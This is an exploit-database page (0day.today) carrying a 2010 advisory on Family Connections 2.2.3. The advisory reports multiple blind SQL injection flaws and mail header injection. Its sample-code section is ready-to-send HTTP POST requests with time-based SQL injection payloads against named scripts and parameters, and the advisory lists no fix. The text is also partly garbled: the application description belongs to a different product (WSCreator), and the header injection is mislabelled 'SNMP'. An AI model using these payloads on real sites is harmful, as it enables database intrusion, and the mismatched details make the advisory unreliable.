0day.today - Biggest Exploit Database in the World.

Select your language:

Things you should know about 0day.today:

We use one main domain: http://0day.today
Most of the materials is completely FREE
If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD

We accept currencies: [contact admin to find more]

We don't want you to use our site as a tool for hacking purposes, so any kind of action that could affect illegaly other users or websites that you don't have right to access will be banned and your account including your data will be destroyed.

Administration of this site uses the official contacts. Beware of impostors!

We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!

I am registered user of 0day.today. I don't want to see this screen in future.

What to do first?

Read the [ agreement ]
Read the [ Submit ] rules
Visit the [ faq ] page
[ Register ] profile
Get [ GOLD ]
If you want to [ sell ]
If you want to [ buy ]
If you lost [ Account ]
Any questions [ admin@0day.today ]

Main links

You can contact us by

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

[ authorization ] [ registration ] [ restore account ]

You can contact us by:

Mail:

mr.inj3ct0r@gmail.com

Facebook:

Inj3ct0rs

Twitter:

Inj3ct0r

Telegram:

We DO NOT use Telegram or any messengers / social networks!

Family Connections 2.2.3 Multiple Remote Vulnerabilities

Author

Salvatore Fresta

Risk

[

Security Risk Unsored

]

0day-ID

Category

Date add

Platform

========================================================
Family Connections 2.2.3 Multiple Remote Vulnerabilities
========================================================

Family Connections 2.2.3 Multiple Remote Vulnerabilities
 
 Name              Family Connections
 Vendor            http://www.familycms.com
 Versions Affected 2.2.3
 
 Author            Salvatore Fresta aka Drosophila
 Website           http://www.salvatorefresta.net
 Contact           salvatorefresta [at] gmail [dot] com
 Date              2010-10-05
 
X. INDEX
 
 I.    ABOUT THE APPLICATION
 II.   DESCRIPTION
 III.  ANALYSIS
 IV.   SAMPLE CODE
 V.    FIX
  
 
I. ABOUT THE APPLICATION
 
Based on one of the world's leading structure  and content
management systems - WebSiteAdmin, WSCreator  (WS standing
for WebSite) is powerful application for handling multiple
websites.
 
 
II. DESCRIPTION
 
Many fields are not properly sanitised.
 
 
III. ANALYSIS
 
Summary:
 
 A) Multiple Blind SQL Injection
 B) Multiple SNMP Injection
  
 
A) Multiple Blind SQL Injection
 
All numeric  fields  that I tested are vulnerable to Blind
SQL Injection.
These  bugs  exist  because of the use of the unquotes SQL
fields (numeric fileds only) which  are not properly sani-
tised.
 
 
B) Multiple SNMP Injection
 
The parameters passed to the mail() PHP function  are  not
properly sanitised. This  allows  to inject arbitrary SNMP
headers.
 
 
IV. SAMPLE CODE
 
A) Multiple Blind SQL Injection
 
POST /path/recipes.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/gallery/upload.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 70
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
category=(SELECT(IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)))
 
 
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
editsubmit=1&aid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/addressbook.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 74
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
editsubmit=1&uid=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length: 67
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
edit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/calendar.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
submitedit=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
POST /path/familynews.php HTTP/1.1
Host: targethost
Content-Type: application/x-www-form-urlencoded
Content-Length:73
Cookie: PHPSESSID=50e78936f22e0ffb7c5df13011fa2dfd
 
delconfirm=1&id=-1 OR IF(ASCII(0x41) = 65,BENCHMARK(999999999,NULL),NULL)
 
 
V. FIX
 
No Fix.



#  0day.today [2024-06-27]  #

We DO NOT use Telegram or any messengers / social networks!

Please, beware of scammers!

Family Connections 2.2.3 Multiple Remote Vulnerabilities

Report Error

Report Error